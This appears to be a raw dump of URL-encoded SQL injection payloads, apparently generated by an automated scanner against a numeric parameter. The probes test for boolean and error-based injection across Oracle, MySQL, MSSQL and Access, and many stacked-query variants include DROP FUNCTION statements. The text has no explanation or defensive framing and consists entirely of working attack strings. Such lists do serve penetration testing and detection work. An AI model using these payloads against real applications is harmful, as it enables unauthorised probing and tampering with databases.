%28SELECT%20%28CASE%20WHEN%20%284936%3D4936%29%20THEN%20CHR%2849%29%7C%7CCHR%2850%29%7C%7CCHR%2851%29%7C%7CCHR%2852%29%7C%7CCHR%2846%29%7C%7CCHR%2853%29%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 IIF%288539%3D7500%2CCHR%2849%29%26CHR%2850%29%26CHR%2851%29%26CHR%2852%29%26CHR%2846%29%26CHR%2853%29%2C1%2F0%29 IIF%285363%3D5363%2CCHR%2849%29%26CHR%2850%29%26CHR%2851%29%26CHR%2852%29%26CHR%2846%29%26CHR%2853%29%2C1%2F0%29 %28CASE%20WHEN%202322%3D1955%20THEN%20%271234.5%27%20ELSE%20NULL%20END%29 %28CASE%20WHEN%203017%3D3017%20THEN%20%271234.5%27%20ELSE%20NULL%20END%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%286669%3D9875%29%20THEN%201%20ELSE%201%2F%28SELECT%200%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%281295%3D1295%29%20THEN%201%20ELSE%201%2F%28SELECT%200%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%285524%3D9052%29%20THEN%20%271234.5%27%20ELSE%201%2F%28SELECT%200%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%283762%3D3762%29%20THEN%20%271234.5%27%20ELSE%201%2F%28SELECT%200%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%281998%3D8334%29%20THEN%200x313233342e35%20ELSE%201998%2A%28SELECT%201998%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%289733%3D9733%29%20THEN%200x313233342e35%20ELSE%209733%2A%28SELECT%209733%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%281787%3D9895%29%20THEN%200x313233342e35%20ELSE%201787%2A%28SELECT%201787%20FROM%20mysql.db%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%287197%3D7197%29%20THEN%200x313233342e35%20ELSE%207197%2A%28SELECT%207197%20FROM%20mysql.db%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%289591%3D4064%29%20THEN%20CHAR%2849%29%2BCHAR%2850%29%2BCHAR%2851%29%2BCHAR%2852%29%2BCHAR%2846%29%2BCHAR%2853%29%20ELSE%209591%2A%28SELECT%209591%20FROM%20master..sysdatabases%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%283014%3D3014%29%20THEN%20CHAR%2849%29%2BCHAR%2850%29%2BCHAR%2851%29%2BCHAR%2852%29%2BCHAR%2846%29%2BCHAR%2853%29%20ELSE%203014%2A%28SELECT%203014%20FROM%20master..sysdatabases%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%285995%3D1758%29%20THEN%20CHR%2849%29%7C%7CCHR%2850%29%7C%7CCHR%2851%29%7C%7CCHR%2852%29%7C%7CCHR%2846%29%7C%7CCHR%2853%29%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%288202%3D8202%29%20THEN%20CHR%2849%29%7C%7CCHR%2850%29%7C%7CCHR%2851%29%7C%7CCHR%2852%29%7C%7CCHR%2846%29%7C%7CCHR%2853%29%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 1234.5%2CIIF%283865%3D4543%2CCHR%2849%29%26CHR%2850%29%26CHR%2851%29%26CHR%2852%29%26CHR%2846%29%26CHR%2853%29%2C1%2F0%29 1234.5%2CIIF%288766%3D8766%2CCHR%2849%29%26CHR%2850%29%26CHR%2851%29%26CHR%2852%29%26CHR%2846%29%26CHR%2853%29%2C1%2F0%29 1234.5%29%3B%20IF%28%286290%3D6913%29%2CSELECT%206290%2CDROP%20FUNCTION%20GFcl%29%23 1234.5%29%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%27%29%3B%20IF%28%285201%3D1805%29%2CSELECT%205201%2CDROP%20FUNCTION%20gRtc%29%23 1234.5%27%29%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%27%3B%20IF%28%283975%3D7559%29%2CSELECT%203975%2CDROP%20FUNCTION%20wESq%29%23 1234.5%27%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%22%3B%20IF%28%282295%3D4927%29%2CSELECT%202295%2CDROP%20FUNCTION%20RZXW%29%23 1234.5%22%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%29%3B%20IF%28%288172%3D9127%29%2CSELECT%208172%2CDROP%20FUNCTION%20oMsl%29%23 1234.5%29%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%29%29%3B%20IF%28%285625%3D5398%29%2CSELECT%205625%2CDROP%20FUNCTION%20iJVb%29%23 1234.5%29%29%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%29%29%29%3B%20IF%28%283539%3D5167%29%2CSELECT%203539%2CDROP%20FUNCTION%20sPQb%29%23 1234.5%29%29%29%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%3B%20IF%28%286228%3D9993%29%2CSELECT%206228%2CDROP%20FUNCTION%20QhfZ%29%23 1234.5%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%27%29%3B%20IF%28%286018%3D7547%29%2CSELECT%206018%2CDROP%20FUNCTION%20Zocd%29%23 1234.5%27%29%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%27%29%29%3B%20IF%28%287557%3D7124%29%2CSELECT%207557%2CDROP%20FUNCTION%20lapO%29%23 1234.5%27%29%29%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%27%29%29%29%3B%20IF%28%281265%3D1415%29%2CSELECT%201265%2CDROP%20FUNCTION%20KSNR%29%23 1234.5%27%29%29%29%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%27%3B%20IF%28%285345%3D5984%29%2CSELECT%205345%2CDROP%20FUNCTION%20qZlf%29%23 1234.5%27%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%27%29%3B%20IF%28%284646%3D1423%29%2CSELECT%204646%2CDROP%20FUNCTION%20kabB%29%23 1234.5%27%29%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%27%29%29%3B%20IF%28%281910%3D7010%29%2CSELECT%201910%2CDROP%20FUNCTION%20gTYG%29%23 1234.5%27%29%29%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%27%29%29%29%3B%20IF%28%284973%3D6037%29%2CSELECT%204973%2CDROP%20FUNCTION%20ZKsR%29%23 1234.5%27%29%29%29%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%27%3B%20IF%28%284929%3D9127%29%2CSELECT%204929%2CDROP%20FUNCTION%20VaRz%29%23 1234.5%27%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%22%29%3B%20IF%28%281717%3D7355%29%2CSELECT%201717%2CDROP%20FUNCTION%20PuyC%29%23 1234.5%22%29%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%22%29%29%3B%20IF%28%284002%3D1464%29%2CSELECT%204002%2CDROP%20FUNCTION%20aOXq%29%23 1234.5%22%29%29%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%22%29%29%29%3B%20IF%28%289293%3D6634%29%2CSELECT%209293%2CDROP%20FUNCTION%20AdTV%29%23 1234.5%22%29%29%29%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%22%3B%20IF%28%283284%3D2503%29%2CSELECT%203284%2CDROP%20FUNCTION%20QgQc%29%23 1234.5%22%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%22%29%3B%20IF%28%284666%3D5908%29%2CSELECT%204666%2CDROP%20FUNCTION%20SSft%29%23 1234.5%22%29%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%22%29%29%3B%20IF%28%283138%3D5735%29%2CSELECT%203138%2CDROP%20FUNCTION%20MSWg%29%23 1234.5%22%29%29%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%22%29%29%29%3B%20IF%28%289476%3D4339%29%2CSELECT%209476%2CDROP%20FUNCTION%20YGKx%29%23 1234.5%22%29%29%29%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%22%3B%20IF%28%287201%3D4987%29%2CSELECT%207201%2CDROP%20FUNCTION%20ZLRA%29%23 1234.5%22%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%25%27%29%3B%20IF%28%289124%3D4092%29%2CSELECT%209124%2CDROP%20FUNCTION%20EpGj%29%23 1234.5%25%27%29%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%25%27%29%29%3B%20IF%28%287879%3D6893%29%2CSELECT%207879%2CDROP%20FUNCTION%20RwsY%29%23 1234.5%25%27%29%29%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%25%27%29%29%29%3B%20IF%28%288899%3D6641%29%2CSELECT%208899%2CDROP%20FUNCTION%20Mdth%29%23 1234.5%25%27%29%29%29%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%25%27%3B%20IF%28%289312%3D2007%29%2CSELECT%209312%2CDROP%20FUNCTION%20RPbm%29%23 1234.5%25%27%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%00%27%29%3B%20IF%28%285647%3D4247%29%2CSELECT%205647%2CDROP%20FUNCTION%20hMRz%29%23 1234.5%00%27%29%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%00%27%3B%20IF%28%288679%3D3940%29%2CSELECT%208679%2CDROP%20FUNCTION%20ZMqG%29%23 1234.5%00%27%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%27%29%20WHERE%208034%3D8034%3B%20IF%28%287354%3D7734%29%2CSELECT%207354%2CDROP%20FUNCTION%20DkBs%29%23 1234.5%27%29%20WHERE%207252%3D7252%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%22%29%20WHERE%204892%3D4892%3B%20IF%28%283163%3D5319%29%2CSELECT%203163%2CDROP%20FUNCTION%20zrYw%29%23 1234.5%22%29%20WHERE%206358%3D6358%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%29%20WHERE%202726%3D2726%3B%20IF%28%284909%3D4913%29%2CSELECT%204909%2CDROP%20FUNCTION%20jEnM%29%23 1234.5%29%20WHERE%209313%3D9313%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%27%20WHERE%204171%3D4171%3B%20IF%28%289743%3D4258%29%2CSELECT%209743%2CDROP%20FUNCTION%20TJTe%29%23 1234.5%27%20WHERE%202551%3D2551%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%22%20WHERE%202986%3D2986%3B%20IF%28%282351%3D5060%29%2CSELECT%202351%2CDROP%20FUNCTION%20dpXc%29%23 1234.5%22%20WHERE%201012%3D1012%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%20WHERE%207473%3D7473%3B%20IF%28%282617%3D9275%29%2CSELECT%202617%2CDROP%20FUNCTION%20usUI%29%23 1234.5%20WHERE%209366%3D9366%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%27%7C%7C%28SELECT%20%27TFRi%27%20FROM%20DUAL%20WHERE%203397%3D3397%3B%20IF%28%286169%3D1639%29%2CSELECT%206169%2CDROP%20FUNCTION%20yUSP%29%23 1234.5%27%7C%7C%28SELECT%20%27Jwrg%27%20FROM%20DUAL%20WHERE%207546%3D7546%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%27%7C%7C%28SELECT%20%27ldIF%27%20WHERE%206116%3D6116%3B%20IF%28%288883%3D5105%29%2CSELECT%208883%2CDROP%20FUNCTION%20QIVn%29%23 1234.5%27%7C%7C%28SELECT%20%27ZhUy%27%20WHERE%204455%3D4455%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%27%2B%28SELECT%20CJfc%20WHERE%209985%3D9985%3B%20IF%28%283618%3D1447%29%2CSELECT%203618%2CDROP%20FUNCTION%20OTiv%29%23 1234.5%27%2B%28SELECT%20LSQa%20WHERE%208264%3D8264%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%27%2B%28SELECT%20%27agxQ%27%20WHERE%203493%3D3493%3B%20IF%28%288547%3D2026%29%2CSELECT%208547%2CDROP%20FUNCTION%20hvSG%29%23 1234.5%27%2B%28SELECT%20%27vBHY%27%20WHERE%203301%3D3301%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%28%288243%3D5173%29%2CSELECT%208243%2CDROP%20FUNCTION%20tyUW%29%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%28%288037%3D8037%29%2CSELECT%208037%2CDROP%20FUNCTION%20BhzK%29%23 1234.5%29%3B%20IF%286132%3D7051%29%20SELECT%206132%20ELSE%20DROP%20FUNCTION%20BgzK-- 1234.5%29%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%27%29%3B%20IF%282503%3D7866%29%20SELECT%202503%20ELSE%20DROP%20FUNCTION%20InKB-- 1234.5%27%29%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%27%3B%20IF%282748%3D7292%29%20SELECT%202748%20ELSE%20DROP%20FUNCTION%20bUOJ-- 1234.5%27%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%22%3B%20IF%289802%3D7876%29%20SELECT%209802%20ELSE%20DROP%20FUNCTION%20XwVE-- 1234.5%22%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%29%3B%20IF%287633%3D4176%29%20SELECT%207633%20ELSE%20DROP%20FUNCTION%20srOw-- 1234.5%29%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%29%29%3B%20IF%285641%3D5193%29%20SELECT%205641%20ELSE%20DROP%20FUNCTION%20DnaP-- 1234.5%29%29%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%29%29%29%3B%20IF%283440%3D8324%29%20SELECT%203440%20ELSE%20DROP%20FUNCTION%20nKmg-- 1234.5%29%29%29%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%3B%20IF%285376%3D6340%29%20SELECT%205376%20ELSE%20DROP%20FUNCTION%20UwvD-- 1234.5%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%27%29%3B%20IF%281009%3D9291%29%20SELECT%201009%20ELSE%20DROP%20FUNCTION%20tkWk-- 1234.5%27%29%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%27%29%29%3B%20IF%288698%3D8291%29%20SELECT%208698%20ELSE%20DROP%20FUNCTION%20nxJN-- 1234.5%27%29%29%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%27%29%29%29%3B%20IF%281839%3D6376%29%20SELECT%201839%20ELSE%20DROP%20FUNCTION%20expt-- 1234.5%27%29%29%29%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%27%3B%20IF%288416%3D3927%29%20SELECT%208416%20ELSE%20DROP%20FUNCTION%20DiXE-- 1234.5%27%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%27%29%3B%20IF%289968%3D2493%29%20SELECT%209968%20ELSE%20DROP%20FUNCTION%20pWgx-- 1234.5%27%29%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%27%29%29%3B%20IF%285616%3D5198%29%20SELECT%205616%20ELSE%20DROP%20FUNCTION%20ojwO-- 1234.5%27%29%29%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%27%29%29%29%3B%20IF%282821%3D8531%29%20SELECT%202821%20ELSE%20DROP%20FUNCTION%20LwSH-- 1234.5%27%29%29%29%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%27%3B%20IF%285122%3D6820%29%20SELECT%205122%20ELSE%20DROP%20FUNCTION%20PLfH-- 1234.5%27%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%22%29%3B%20IF%289659%3D5672%29%20SELECT%209659%20ELSE%20DROP%20FUNCTION%20zHcj-- 1234.5%22%29%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%22%29%29%3B%20IF%285890%3D2996%29%20SELECT%205890%20ELSE%20DROP%20FUNCTION%20wCpt-- 1234.5%22%29%29%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%22%29%29%29%3B%20IF%285485%3D9108%29%20SELECT%205485%20ELSE%20DROP%20FUNCTION%20KPaG-- 1234.5%22%29%29%29%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%22%3B%20IF%287948%3D5784%29%20SELECT%207948%20ELSE%20DROP%20FUNCTION%20GrAs-- 1234.5%22%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%22%29%3B%20IF%282664%3D3210%29%20SELECT%202664%20ELSE%20DROP%20FUNCTION%20GMIj-- 1234.5%22%29%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%22%29%29%3B%20IF%287442%3D2448%29%20SELECT%207442%20ELSE%20DROP%20FUNCTION%20pPSK-- 1234.5%22%29%29%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%22%29%29%29%3B%20IF%282756%3D4606%29%20SELECT%202756%20ELSE%20DROP%20FUNCTION%20xQtF-- 1234.5%22%29%29%29%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%22%3B%20IF%287296%3D8108%29%20SELECT%207296%20ELSE%20DROP%20FUNCTION%20PICb-- 1234.5%22%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%25%27%29%3B%20IF%282867%3D8231%29%20SELECT%202867%20ELSE%20DROP%20FUNCTION%20IweX-- 1234.5%25%27%29%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%25%27%29%29%3B%20IF%288808%3D8641%29%20SELECT%208808%20ELSE%20DROP%20FUNCTION%20iBBp-- 1234.5%25%27%29%29%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%25%27%29%29%29%3B%20IF%289667%3D5255%29%20SELECT%209667%20ELSE%20DROP%20FUNCTION%20cwtU-- 1234.5%25%27%29%29%29%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%25%27%3B%20IF%288052%3D5074%29%20SELECT%208052%20ELSE%20DROP%20FUNCTION%20kSoF-- 1234.5%25%27%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%00%27%29%3B%20IF%283956%3D4573%29%20SELECT%203956%20ELSE%20DROP%20FUNCTION%20CQtc-- 1234.5%00%27%29%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%00%27%3B%20IF%284862%3D4423%29%20SELECT%204862%20ELSE%20DROP%20FUNCTION%20Nuzh-- 1234.5%00%27%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%27%29%20WHERE%205196%3D5196%3B%20IF%289464%3D2914%29%20SELECT%209464%20ELSE%20DROP%20FUNCTION%20fVfH-- 1234.5%27%29%20WHERE%204625%3D4625%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%22%29%20WHERE%205269%3D5269%3B%20IF%285882%3D5741%29%20SELECT%205882%20ELSE%20DROP%20FUNCTION%20lPGW-- 1234.5%22%29%20WHERE%206885%3D6885%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%29%20WHERE%206348%3D6348%3B%20IF%283971%3D9557%29%20SELECT%203971%20ELSE%20DROP%20FUNCTION%20FPrz-- 1234.5%29%20WHERE%203993%3D3993%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%27%20WHERE%206983%3D6983%3B%20IF%284658%3D4309%29%20SELECT%204658%20ELSE%20DROP%20FUNCTION%20KRkN-- 1234.5%27%20WHERE%209150%3D9150%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%22%20WHERE%208904%3D8904%3B%20IF%281567%3D3927%29%20SELECT%201567%20ELSE%20DROP%20FUNCTION%20WvdG-- 1234.5%22%20WHERE%204650%3D4650%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%20WHERE%208875%3D8875%3B%20IF%287707%3D3655%29%20SELECT%207707%20ELSE%20DROP%20FUNCTION%20zbFa-- 1234.5%20WHERE%207908%3D7908%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%27%7C%7C%28SELECT%20%27Wmps%27%20FROM%20DUAL%20WHERE%204213%3D4213%3B%20IF%287078%3D1388%29%20SELECT%207078%20ELSE%20DROP%20FUNCTION%20Zcpw-- 1234.5%27%7C%7C%28SELECT%20%27naxW%27%20FROM%20DUAL%20WHERE%208039%3D8039%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%27%7C%7C%28SELECT%20%27hWvH%27%20WHERE%207878%3D7878%3B%20IF%285660%3D4186%29%20SELECT%205660%20ELSE%20DROP%20FUNCTION%20NvIb-- 1234.5%27%7C%7C%28SELECT%20%27haOw%27%20WHERE%203105%3D3105%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%27%2B%28SELECT%20KpDR%20WHERE%208950%3D8950%3B%20IF%283590%3D4588%29%20SELECT%203590%20ELSE%20DROP%20FUNCTION%20eold-- 1234.5%27%2B%28SELECT%20RkvT%20WHERE%209700%3D9700%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%27%2B%28SELECT%20%27WFdH%27%20WHERE%204304%3D4304%3B%20IF%285302%3D8070%29%20SELECT%205302%20ELSE%20DROP%20FUNCTION%20clRi-- 1234.5%27%2B%28SELECT%20%27BZWD%27%20WHERE%202273%3D2273%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%287931%3D9352%29%20SELECT%207931%20ELSE%20DROP%20FUNCTION%20katF-- 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%284810%3D4810%29%20SELECT%204810%20ELSE%20DROP%20FUNCTION%20xWjr-- -1177%29%3B%20SELECT%20%28CASE%20WHEN%20%289454%3D5628%29%20THEN%209454%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3653%29%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5929%29%3B%20SELECT%20%28CASE%20WHEN%20%287730%3D3621%29%20THEN%207730%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7176%27%29%3B%20SELECT%20%28CASE%20WHEN%20%288868%3D3979%29%20THEN%208868%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8100%27%29%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1930%27%29%3B%20SELECT%20%28CASE%20WHEN%20%284086%3D1470%29%20THEN%204086%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3514%27%3B%20SELECT%20%28CASE%20WHEN%20%283007%3D7429%29%20THEN%203007%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3776%27%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -2730%27%3B%20SELECT%20%28CASE%20WHEN%20%284126%3D7768%29%20THEN%204126%20ELSE%201%2F%28SELECT%200%29%20END%29-- -6554%22%3B%20SELECT%20%28CASE%20WHEN%20%284526%3D8267%29%20THEN%204526%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7827%22%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3936%22%3B%20SELECT%20%28CASE%20WHEN%20%285942%3D2763%29%20THEN%205942%20ELSE%201%2F%28SELECT%200%29%20END%29-- -9261%29%3B%20SELECT%20%28CASE%20WHEN%20%285176%3D9552%29%20THEN%205176%20ELSE%201%2F%28SELECT%200%29%20END%29-- -5722%29%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8911%29%3B%20SELECT%20%28CASE%20WHEN%20%289396%3D2718%29%20THEN%209396%20ELSE%201%2F%28SELECT%200%29%20END%29-- -3610%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287260%3D2320%29%20THEN%207260%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1992%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -8514%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287006%3D5168%29%20THEN%207006%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7981%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%283547%3D2506%29%20THEN%203547%20ELSE%201%2F%28SELECT%200%29%20END%29-- -6646%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7602%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286268%3D3949%29%20THEN%206268%20ELSE%201%2F%28SELECT%200%29%20END%29-- -1377%3B%20SELECT%20%28CASE%20WHEN%20%284660%3D2587%29%20THEN%204660%20ELSE%201%2F%28SELECT%200%29%20END%29-- -7001%3B%20SELECT%20%28CASE%20WHEN%20%286470%3D6470%29%20THEN%206470%20ELSE%201%2F%28SELECT%200%29%20END%29-- -4682%3B%20SELECT%20%28CASE%20WHEN%20%284594%3D3193%29%20THEN%204594%20ELSE%201%2F%28SELECT%200%29%20END%29-- 